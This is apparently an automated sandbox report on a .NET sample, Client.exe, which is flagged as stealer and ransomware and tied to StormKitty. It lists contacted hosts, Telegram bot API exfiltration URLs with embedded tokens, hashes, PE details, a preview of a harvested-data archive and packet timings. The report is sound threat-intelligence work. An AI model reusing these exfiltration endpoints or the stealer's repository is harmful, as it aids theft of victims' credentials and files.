https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13	Client.exe	false	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org	Client.exe, 00000000.00000002.4562681336.0000000003101000.00000004.00000800.00020000.00000000.sdmp	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=16191	Client.exe, 00000000.00000002.4562681336.0000000003101000.00000004.00000800.00020000.00000000.sdmp	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot	Client.exe	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096	Client.exe, 00000000.00000002.4562681336.0000000003449000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/send	Client.exe	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.dr	false	URL Reputation: safe	unknown
https://api.telegram.org/bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendDocument?chat_id=1619	Client.exe, 00000000.00000002.4562681336.0000000003412000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.telegram.orgD	Client.exe, 00000000.00000002.4562681336.0000000003412000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	tmpE267.tmp.dat.0.dr	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.dr	false	URL Reputation: safe	unknown
https://github.com/LimerBoy/StormKitty	Client.exe	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	tmpE267.tmp.dat.0.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.dr	false	URL Reputation: safe	unknown
https://github.com/LimerBoy/StormKitty0&	Client.exe, 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://api.telegram.orgd	Client.exe, 00000000.00000002.4562681336.0000000003449000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000000.00000002.4562681336.0000000003412000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org	tmpE267.tmp.dat.0.dr	false	URL Reputation: safe	unknown
https://api.telegram.org/file/bot	Client.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://api.telegram.org	Client.exe, 00000000.00000002.4562681336.0000000003449000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 00000000.00000002.4562681336.0000000003412000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Client.exe, 00000000.00000002.4562681336.0000000003071000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmpE154.tmp.dat.0.dr, tmpE186.tmp.dat.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
104.16.185.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false
172.67.196.114	api.mylnikov.org	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1501596
Start date and time:	2024-08-30 07:13:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Client.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@17/139@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 122 Number of non-executed functions: 9
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:14:08	API Interceptor	10302357x Sleep call for process: Client.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	i3F8zuP3u9.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Detailed Itinerary.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse
	IDM_ACT.exe	Get hash	malicious	Fredy Stealer	Browse
	IDM_ACT.exe	Get hash	malicious	Fredy Stealer	Browse
	Nettably.exe	Get hash	malicious	Snake Keylogger	Browse
	Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	8468281651.exe	Get hash	malicious	Snake Keylogger	Browse
	SecuriteInfo.com.Trojan.Inject5.5513.6456.21079.exe	Get hash	malicious	AgentTesla	Browse
	172491222445a0c92f9706bf9b262539610e069f8890c9344283eed4f05fff1647f3cf570f744.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	QUOTATION_AUGQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
104.16.185.241	SecuriteInfo.com.MSIL.MassLogger-G.1448.1172.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	icanhazip.com/
	22.08.2024.exe	Get hash	malicious	Xmrig	Browse	icanhazip.com/
	vYz1Z2heor.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	icanhazip.com/
	WinRAR 7.01 Pro.exe	Get hash	malicious	PureLog Stealer, WorldWind Stealer	Browse	icanhazip.com/
	PasteHook.exe	Get hash	malicious	AsyncRAT, DCRat, StormKitty, WorldWind Stealer, Xmrig	Browse	icanhazip.com/
	eEo6DAcnnx.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	icanhazip.com/
	5oci4lcontract.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	icanhazip.com/
	viVOqZjAT0.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	icanhazip.com/
	down.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	icanhazip.com/
	7Y18r(198).exe	Get hash	malicious	Upatre	Browse	icanhazip.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.mylnikov.org	vYz1Z2heor.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	WinRAR 7.01 Pro.exe	Get hash	malicious	PureLog Stealer, WorldWind Stealer	Browse	104.21.44.66
	PasteHook.exe	Get hash	malicious	AsyncRAT, DCRat, StormKitty, WorldWind Stealer, Xmrig	Browse	104.21.44.66
	eEo6DAcnnx.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	83MZfLKh7D.exe	Get hash	malicious	AsyncRAT, Discord Token Stealer, Luca Stealer, MicroClip, RedLine	Browse	104.21.44.66
	viVOqZjAT0.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.21.44.66
	LisectAVT_2403002B_4.exe	Get hash	malicious	AsyncRAT, Neshta, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	2U1S7Ab7YU.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	xj40xovMsm.exe	Get hash	malicious	AsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLine	Browse	172.67.196.114
	Kh7W85ONS7.exe	Get hash	malicious	AsyncRAT, DarkTortilla, StormKitty, WorldWind Stealer	Browse	104.21.44.66
api.telegram.org	i3F8zuP3u9.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	Detailed Itinerary.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	149.154.167.220
	IDM_ACT.exe	Get hash	malicious	Fredy Stealer	Browse	149.154.167.220
	IDM_ACT.exe	Get hash	malicious	Fredy Stealer	Browse	149.154.167.220
	Nettably.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	8468281651.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.Inject5.5513.6456.21079.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	172491222445a0c92f9706bf9b262539610e069f8890c9344283eed4f05fff1647f3cf570f744.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION_AUGQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
icanhazip.com	SecuriteInfo.com.MSIL.MassLogger-G.1448.1172.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	104.16.185.241
	22.08.2024.exe	Get hash	malicious	Xmrig	Browse	104.16.185.241
	vYz1Z2heor.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.16.185.241
	4b27fd5c70588d922a25f658f35d5c5d3e0085ba88d9bb9b25746c52b2b58e59_dump.exe	Get hash	malicious	PureLog Stealer, SmokeLoader, TrojanRansom, zgRAT	Browse	104.16.184.241
	WinRAR 7.01 Pro.exe	Get hash	malicious	PureLog Stealer, WorldWind Stealer	Browse	104.16.185.241
	PasteHook.exe	Get hash	malicious	AsyncRAT, DCRat, StormKitty, WorldWind Stealer, Xmrig	Browse	104.16.185.241
	eEo6DAcnnx.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.16.185.241
	83MZfLKh7D.exe	Get hash	malicious	AsyncRAT, Discord Token Stealer, Luca Stealer, MicroClip, RedLine	Browse	104.16.184.241
	5oci4lcontract.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	104.16.185.241
	Inquiry.vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	104.16.184.241

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	i3F8zuP3u9.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	149.154.167.99
	Detailed Itinerary.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	149.154.167.220
	IDM_ACT.exe	Get hash	malicious	Fredy Stealer	Browse	149.154.167.220
	IDM_ACT.exe	Get hash	malicious	Fredy Stealer	Browse	149.154.167.220
	Nettably.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	8468281651.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Trojan.Inject5.5513.6456.21079.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	172491222445a0c92f9706bf9b262539610e069f8890c9344283eed4f05fff1647f3cf570f744.dat-decoded.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	DPPLYAD_12872 PDF.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	https://eu-central-1.protection.sophos.com/?d=manychat.com&u=aHR0cHM6Ly9teS5tYW55Y2hhdC5jb20vcj9hY3Q9YjFkMWQwZDkyMDBkMzg2OGQxODUzY2NhYTk0Y2MxYmQmdT03ODg3NjgyNjIxMzQyNDMwJnA9MTAzMTAzNDUyNjg5OTI1Jmg9YTM4ZGRlMzNiMCZmYmNsaWQ9SXdaWGgwYmdOaFpXMENNVEFBQVIyNTVGWGl1MGk2VnFpR29zYktwampSVVgxQllIR2VXMjIzY0VsdzhQV1JxQkljdzFwOEtxQ3QydHNfYWVtX3djeUE3ZklHUmc5anZ3elZEVUZnc1E=&p=m&i=NjM1OGY5Yjk1Yzc0NzYwZmVkZjg4ODBh&t=UnJja2pSclhrTCtBamxpVW5SbExkeEY5Y3JMRXJReFA1MHNjMk83N01UTT0=&h=ac3121ecdd334a8eb27b9efa20223e6a&s=AVNPUEhUT0NFTkNSWVBUSVYt5nkMY7lrXten-tMtQEoHjKHanPDgFGYEyZWMpkBETxK29AsSDujuoNOgxyOGay3pj-cHDVi7N9Bi-dbvWmnMoslvZEuKFbMo_q4CIRO7yQ	Get hash	malicious	Unknown	Browse	104.17.25.14
	gHPYUEh253.exe	Get hash	malicious	Djvu, Neoreklami, Stealc, Vidar, Xmrig	Browse	104.26.8.59
	33601ca.exe	Get hash	malicious	Unknown	Browse	104.21.35.232
	35b0000.exe	Get hash	malicious	Unknown	Browse	172.67.180.170
	33601ca.exe	Get hash	malicious	Unknown	Browse	104.21.35.232
	35b0000.exe	Get hash	malicious	Unknown	Browse	104.21.35.232
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://www.bettercaremarket.com.au/pill-bottle-opener-with-magnifier-aidapt.html?comet_source=google&comet_network=x&comet_campaign=20867905123&comet_ad_group=&comet_ad_id=&comet_keyword=&comet_type=smart&gad_source=1&gclid=EAIaIQobChMIqcj6sY-ZhwMV5tgWBR0YswpVEAQYASABEgJi9fD_BwE	Get hash	malicious	Unknown	Browse	104.21.37.20
CLOUDFLARENETUS	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	DPPLYAD_12872 PDF.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	https://eu-central-1.protection.sophos.com/?d=manychat.com&u=aHR0cHM6Ly9teS5tYW55Y2hhdC5jb20vcj9hY3Q9YjFkMWQwZDkyMDBkMzg2OGQxODUzY2NhYTk0Y2MxYmQmdT03ODg3NjgyNjIxMzQyNDMwJnA9MTAzMTAzNDUyNjg5OTI1Jmg9YTM4ZGRlMzNiMCZmYmNsaWQ9SXdaWGgwYmdOaFpXMENNVEFBQVIyNTVGWGl1MGk2VnFpR29zYktwampSVVgxQllIR2VXMjIzY0VsdzhQV1JxQkljdzFwOEtxQ3QydHNfYWVtX3djeUE3ZklHUmc5anZ3elZEVUZnc1E=&p=m&i=NjM1OGY5Yjk1Yzc0NzYwZmVkZjg4ODBh&t=UnJja2pSclhrTCtBamxpVW5SbExkeEY5Y3JMRXJReFA1MHNjMk83N01UTT0=&h=ac3121ecdd334a8eb27b9efa20223e6a&s=AVNPUEhUT0NFTkNSWVBUSVYt5nkMY7lrXten-tMtQEoHjKHanPDgFGYEyZWMpkBETxK29AsSDujuoNOgxyOGay3pj-cHDVi7N9Bi-dbvWmnMoslvZEuKFbMo_q4CIRO7yQ	Get hash	malicious	Unknown	Browse	104.17.25.14
	gHPYUEh253.exe	Get hash	malicious	Djvu, Neoreklami, Stealc, Vidar, Xmrig	Browse	104.26.8.59
	33601ca.exe	Get hash	malicious	Unknown	Browse	104.21.35.232
	35b0000.exe	Get hash	malicious	Unknown	Browse	172.67.180.170
	33601ca.exe	Get hash	malicious	Unknown	Browse	104.21.35.232
	35b0000.exe	Get hash	malicious	Unknown	Browse	104.21.35.232
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	https://www.bettercaremarket.com.au/pill-bottle-opener-with-magnifier-aidapt.html?comet_source=google&comet_network=x&comet_campaign=20867905123&comet_ad_group=&comet_ad_id=&comet_keyword=&comet_type=smart&gad_source=1&gclid=EAIaIQobChMIqcj6sY-ZhwMV5tgWBR0YswpVEAQYASABEgJi9fD_BwE	Get hash	malicious	Unknown	Browse	104.21.37.20

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	i3F8zuP3u9.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220 172.67.196.114
	http://interface-git-main-uniswap.vercel.app/	Get hash	malicious	Unknown	Browse	149.154.167.220 172.67.196.114
	http://metamasskluginn.blogspot.cz/	Get hash	malicious	Unknown	Browse	149.154.167.220 172.67.196.114
	http://kfkkfd.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220 172.67.196.114
	http://pub-83f34dc51f3647dfa8d7b2730955fd48.r2.dev/index.html	Get hash	malicious	Unknown	Browse	149.154.167.220 172.67.196.114
	http://taps.kraftonevent.com/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220 172.67.196.114
	https://attsecure529.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220 172.67.196.114
	http://lloydschatonline.com/	Get hash	malicious	Unknown	Browse	149.154.167.220 172.67.196.114
	http://bt-109929.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220 172.67.196.114
	http://cryptorabotakzz.com/	Get hash	malicious	Unknown	Browse	149.154.167.220 172.67.196.114

Process:	C:\Users\user\Desktop\Client.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	modified
Size (bytes):	187017
Entropy (8bit):	7.9205382963871225
Encrypted:	false
SSDEEP:	3072:fjEjjBk0HedjSGj3ZjwjfhwU7Ktjq6jzijTj72upltjpSmcvQIxaxsudRUIkY06U:L+GBpaeHsf79DIUxsofkY06U
MD5:	58F1D4E4CEF5FBADB79282B64BDB3C2E
SHA1:	D2DADF38ABD3F5F81F972B27947AFE730B94E260
SHA-256:	C34640F6CC1C9C84BCDB87DBDDF9EFB1C9FC883BD8BB7A4F2620D4692CE9E60B
SHA-512:	50DC0B6BEE4E859D1E3A38059D1FD39D9EB3769C0BD40944B5650060E74B3A41C3B6EE588CF32EBAABCDC0BB85ACABFA7CABA7A4BF0C2C2C8861178F522A75FD
Malicious:	false
Reputation:	low
Preview:	PK........j0.Y................Browsers\Edge\PK........j0.Y................Browsers\Google\PK...........YQ3..J...i.......Browsers\Firefox\Bookmarks.txtSVVVpO-Q.H.)PPVV..b.......T........H.g^Y~NYj.\.1)..D!..YUIf^.BpIbQ.T!.PK...........Y...r...1.......Directories\Desktop.txteS...0.<...J/....R..Z.....E.=..k........!no..u8\|~l....I.a..eM.2....ng."DO.5.2Q..#..,.E.j.6...`Z.%......2".+.....'..t..G?.u.SEc[...M#E....H1..~.D.l.f+h...O.8N.Ib.y.e......W&j...Wg...q....Y.JZP+..U;...YC.tX......./........Ri5.....r.K.].}$....^.MH...g.C.J.1.e~xS.T...5....W.....F.}a..i..,.....Iwn.;j...N..s.~ .-..$...C].y\|.+@ka\...>X..'.>.........>..06......PK...........Y.u.............Directories\Documents.txtmS.r.0.<...C..K.@.$.yH......[...v..[(..&..=...'.O.K{..o.O^.QsP.V."RT$(....0{...."ScM...b\|G.4/E5!/....i._..BQ.`..K...5U.'~.>.R.......<..$01..e1......TH...'.?\.J..q.q.............q.Wc.=..f.+j3..5.6......d;7.....~w.xw...[...........g.7.=y.h..O.W@..5m?..<.."De...$......t+...+.f+._......)

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.925602117452437
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Client.exe
File size:	174'080 bytes
MD5:	e29ab30e42348ecf2831928b7b95d5d8
SHA1:	70ae302ae078326efbe444fd8158d2b104a06a69
SHA256:	58b1013f511e61f2ddfb547939895ec161ab8bc03f5413529f85f1a3272d38d4
SHA512:	34a3209dc0856ea0e4d0573eca4dd53b238ebb317f10cb84683d99c64c1264693390d42193fcbac190ce9d9e0a33c9f32de8c4a57e4d38ec267ad16ad5d3138d
SSDEEP:	3072:3+STW8djpN6izj8mZw0YaeiJFqIPu/i9bVJ2cxO06+Wpz:c8XN6W8mm0YmfXPSi9bDD
TLSH:	AE04281437E81929E3FFCBB8F4B002158B72F823A917E76F199458EE2D62354D550BB2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g............"...0.............n.... ........@.. ....................................`................................

Entrypoint:	0x42bd6e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xBBAE67A1 [Sat Oct 12 02:06:25 2069 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2bd14	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x596	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x29d74	0x29e00	c5d4e9f2c4f6be878eaa89ba1e631133	False	0.46550839552238804	data	5.954110335488051	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x596	0x600	9ebffd15afcc38c13c6b979adaf8db7e	False	0.4134114583333333	data	4.029504312109572	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2e000	0xc	0x200	5c56169a77e18db360815ba3767c2c2d	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x2c0a0	0x30c	data			0.4269230769230769
RT_MANIFEST	0x2c3ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 30, 2024 07:14:08.957392931 CEST	49711	80	192.168.2.6	104.16.185.241
Aug 30, 2024 07:14:08.962220907 CEST	80	49711	104.16.185.241	192.168.2.6
Aug 30, 2024 07:14:08.962532043 CEST	49711	80	192.168.2.6	104.16.185.241
Aug 30, 2024 07:14:08.962904930 CEST	49711	80	192.168.2.6	104.16.185.241
Aug 30, 2024 07:14:08.967777014 CEST	80	49711	104.16.185.241	192.168.2.6
Aug 30, 2024 07:14:09.410106897 CEST	80	49711	104.16.185.241	192.168.2.6
Aug 30, 2024 07:14:09.472414017 CEST	49712	443	192.168.2.6	172.67.196.114
Aug 30, 2024 07:14:09.472438097 CEST	443	49712	172.67.196.114	192.168.2.6
Aug 30, 2024 07:14:09.472500086 CEST	49712	443	192.168.2.6	172.67.196.114
Aug 30, 2024 07:14:09.483858109 CEST	49712	443	192.168.2.6	172.67.196.114
Aug 30, 2024 07:14:09.483872890 CEST	443	49712	172.67.196.114	192.168.2.6
Aug 30, 2024 07:14:09.556634903 CEST	49711	80	192.168.2.6	104.16.185.241
Aug 30, 2024 07:14:09.988013983 CEST	443	49712	172.67.196.114	192.168.2.6
Aug 30, 2024 07:14:09.988101006 CEST	49712	443	192.168.2.6	172.67.196.114
Aug 30, 2024 07:14:09.991990089 CEST	49712	443	192.168.2.6	172.67.196.114
Aug 30, 2024 07:14:09.992005110 CEST	443	49712	172.67.196.114	192.168.2.6
Aug 30, 2024 07:14:09.992261887 CEST	443	49712	172.67.196.114	192.168.2.6
Aug 30, 2024 07:14:10.034013987 CEST	49712	443	192.168.2.6	172.67.196.114
Aug 30, 2024 07:14:10.076513052 CEST	443	49712	172.67.196.114	192.168.2.6
Aug 30, 2024 07:14:11.155082941 CEST	443	49712	172.67.196.114	192.168.2.6
Aug 30, 2024 07:14:11.155150890 CEST	443	49712	172.67.196.114	192.168.2.6
Aug 30, 2024 07:14:11.155215979 CEST	49712	443	192.168.2.6	172.67.196.114
Aug 30, 2024 07:14:11.157165051 CEST	49712	443	192.168.2.6	172.67.196.114
Aug 30, 2024 07:14:11.159663916 CEST	49711	80	192.168.2.6	104.16.185.241
Aug 30, 2024 07:14:11.164851904 CEST	80	49711	104.16.185.241	192.168.2.6
Aug 30, 2024 07:14:11.164905071 CEST	49711	80	192.168.2.6	104.16.185.241
Aug 30, 2024 07:14:11.167866945 CEST	49714	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:11.167910099 CEST	443	49714	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:11.167982101 CEST	49714	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:11.168324947 CEST	49714	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:11.168339014 CEST	443	49714	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:11.809101105 CEST	443	49714	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:11.809175968 CEST	49714	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:11.810720921 CEST	49714	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:11.810729027 CEST	443	49714	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:11.810981989 CEST	443	49714	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:11.812618017 CEST	49714	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:11.812653065 CEST	443	49714	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:12.277314901 CEST	443	49714	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:12.277342081 CEST	443	49714	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:12.277399063 CEST	443	49714	149.154.167.220	192.168.2.6
Aug 30, 2024 07:14:12.277405977 CEST	49714	443	192.168.2.6	149.154.167.220
Aug 30, 2024 07:14:12.277466059 CEST	49714	443	192.168.2.6	149.154.167.220
